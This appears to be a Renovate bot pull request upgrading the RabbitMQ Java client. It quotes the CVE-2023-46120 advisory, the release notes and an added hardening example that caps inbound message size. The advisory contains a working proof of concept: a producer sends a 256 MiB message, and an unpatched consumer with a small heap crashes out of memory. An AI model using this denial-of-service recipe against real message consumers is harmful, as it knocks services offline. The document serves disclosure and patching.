Alice52 / common-api

this is spring common api
gitee.com
MIT License
1 stars 0 forks

fix(deps): update dependency com.rabbitmq:amqp-client to v5.18.0 [security] #169

Closed renovate[bot] closed 11 months ago

renovate[bot] commented 11 months ago


This PR contains the following updates:

| Package | Change |
|---|---|
| com.rabbitmq:amqp-client (source) | `5.16.0` -> `5.18.0` |

### GitHub Vulnerability Alerts

#### CVE-2023-46120

### Summary

maxBodyLength was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.

### PoC

#### RabbitMQ

#### Producer

```java
package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Producer {
    public static void main(String[] args) {
        // HelloWorldConfiguration is the Spring AMQP hello-world sample configuration;
        // it is not reproduced in the advisory.
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        // Double the string 28 times: 2^28 characters, i.e. a 256 MiB message body.
        String s = "A";
        for (int i = 0; i < 28; ++i) {
            s = s + s;
            System.out.println(i);
        }
        amqpTemplate.convertAndSend(s);
        System.out.println("Send Finish");
    }
}
```


#### Consumer
* First set the heap memory size to 128M
* Read the message sent by the Producer from the MQ and print the length

```java
package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Consumer {

    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        // receiveAndConvert() pulls one message; the unpatched client assembles the
        // whole body in memory before returning, which is where a 128M heap runs out.
        Object o = amqpTemplate.receiveAndConvert();
        if (o != null) {
            String s = o.toString();
            System.out.println("Received Length : " + s.length());
        } else {
            System.out.println("null");
        }
    }

}
```


#### Results
* Run the Producer first, then the Consumer
* Consumer throws OOM Exception

### Impact
Users of RabbitMQ may suffer from DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.

---

### Release Notes

<details>
<summary>rabbitmq/rabbitmq-java-client (com.rabbitmq:amqp-client)</summary>

### [`v5.18.0`](https://togithub.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.18.0)

[Compare Source](https://togithub.com/rabbitmq/rabbitmq-java-client/compare/v5.17.1...v5.18.0)

### Changes between 5.17.0 and 5.18.0

This is a minor release with usability improvements and dependency upgrades. It is compatible with 5.17.x. All users of the 5.x.x series are encouraged to upgrade.

Inbound message size is now enforced, with default limit being 64 MiB.

Thanks to [@JHahnHRO](https://togithub.com/JHahnHRO) and Sérgio Faria ([@sergio91pt](https://togithub.com/sergio91pt)) for their contribution.

#### Add ability to specify maximum message size

GitHub issue: [#1062](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1062)

#### Do not confirmSelect more than once per channel

GitHub PR: [#1057](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1057)

#### Make RpcClient (Auto)Closeable

GitHub issue: [#1032](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1032)

#### Bump dependencies

GitHub issue: [#999](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/999)

### Dependency

#### Maven

```xml
<dependency>
  <groupId>com.rabbitmq</groupId>
  <artifactId>amqp-client</artifactId>
  <version>5.18.0</version>
</dependency>
```

#### Gradle

```groovy
compile 'com.rabbitmq:amqp-client:5.18.0'
```

### `v5.17.1`

Compare Source

### Changes between 5.17.0 and 5.17.1

This is a minor release with a usability improvement. It is compatible with 5.17.0.

Inbound message size is now enforced, with the default limit being 64 MiB.

#### Add ability to specify maximum message size

GitHub issue: #1062

### `v5.17.0`

Compare Source

### Changes between 5.16.0 and 5.17.0

This is a minor release with bug fixes, usability improvements, and dependency upgrades. It is compatible with 5.16.x. All users of the 5.x.x series are encouraged to upgrade.

Thanks to Nikita Nefedov (@nikita2206) for his contribution.

#### Remove hard dependency on Jackson in OAuth 2 support

GitHub PR: #969

#### NPE in AbstractMetricsCollector when channel limit is exceeded

GitHub issue: #944

#### Report publish failures for the closed channel as well

GitHub PR: #943

#### Remove dependency on java.sql.Timestamp

GitHub PR: #878

#### Bump dependencies

GitHub issue: #848

### Dependency

#### Maven

```xml
<dependency>
  <groupId>com.rabbitmq</groupId>
  <artifactId>amqp-client</artifactId>
  <version>5.17.0</version>
</dependency>
```

#### Gradle

```groovy
compile 'com.rabbitmq:amqp-client:5.17.0'
```

### `v5.16.1`

Compare Source

### Changes between 5.16.0 and 5.16.1

This is a minor release with a usability improvement. It is compatible with 5.16.0.

Inbound message size is now enforced, with the default limit being 64 MiB.

#### Add ability to specify maximum message size

GitHub issue: #1062

</details>

---

### Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR has been generated by Mend Renovate. View repository job log here.
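The advisory above shows the unpatched consumer assembling an arbitrarily large body before the application ever sees it, so no check in application code can prevent the OOM; the limit has to sit in the client, which is what the 5.17.1/5.18.0 release notes above describe ("Inbound message size is now enforced, with the default limit being 64 MiB"). The following is an added example, not code from this PR, the advisory or the rabbitmq-java-client project, showing how a consumer on amqp-client 5.18.0 lowers that ceiling to a value that fits its own heap and bounds in-flight deliveries. The host, the queue name `helloworld.q` and the 8 MiB limit are assumptions chosen for illustration.

```java
import com.rabbitmq.client.Channel;
import com.rabbitmq.client.Connection;
import com.rabbitmq.client.ConnectionFactory;
import com.rabbitmq.client.DeliverCallback;

/**
 * Consumer that caps the inbound message body size at the client level.
 * Requires com.rabbitmq:amqp-client 5.18.0 (the version this PR upgrades to).
 */
public class BoundedConsumer {

    // Assumed per-service ceiling. The client default after the upgrade is 64 MiB
    // (ConnectionFactory.DEFAULT_MAX_INBOUND_MESSAGE_BODY_SIZE); with a 128M heap as in
    // the PoC, a much smaller bound is appropriate.
    static final int MAX_BODY_BYTES = 8 * 1024 * 1024;

    // Assumed queue name for this example.
    static final String QUEUE = "helloworld.q";

    // Builds a factory whose connections refuse to assemble bodies larger than MAX_BODY_BYTES.
    static ConnectionFactory hardenedFactory(String host) {
        ConnectionFactory factory = new ConnectionFactory();
        factory.setHost(host);
        // Added with issue #1062 (release notes above): the size is checked while frames
        // are assembled, before the body is handed to the application.
        factory.setMaxInboundMessageBodySize(MAX_BODY_BYTES);
        return factory;
    }

    public static void main(String[] args) throws Exception {
        try (Connection conn = hardenedFactory("localhost").newConnection();
             Channel ch = conn.createChannel()) {
            ch.queueDeclare(QUEUE, true, false, false, null);
            // Prefetch of 1 keeps at most one unacknowledged body in memory, so the
            // worst-case buffer is prefetch * MAX_BODY_BYTES rather than unbounded.
            ch.basicQos(1);
            DeliverCallback onDeliver = (consumerTag, delivery) -> {
                byte[] body = delivery.getBody();
                System.out.println("Received Length : " + body.length);
                ch.basicAck(delivery.getEnvelope().getDeliveryTag(), false);
            };
            ch.basicConsume(QUEUE, false, onDeliver, consumerTag -> { });
            // Keep the JVM alive while deliveries arrive on the connection's threads.
            Thread.sleep(Long.MAX_VALUE);
        }
    }
}
```

For the Spring AMQP setup used in the PoC, the same `ConnectionFactory` instance can be passed to `CachingConnectionFactory`'s constructor, so the limit applies to every connection Spring opens. Whatever value is chosen, pair it with the producer side: a broker-side `max_message_size` and a publisher that never builds bodies that large keep legitimate traffic from tripping the consumer's limit.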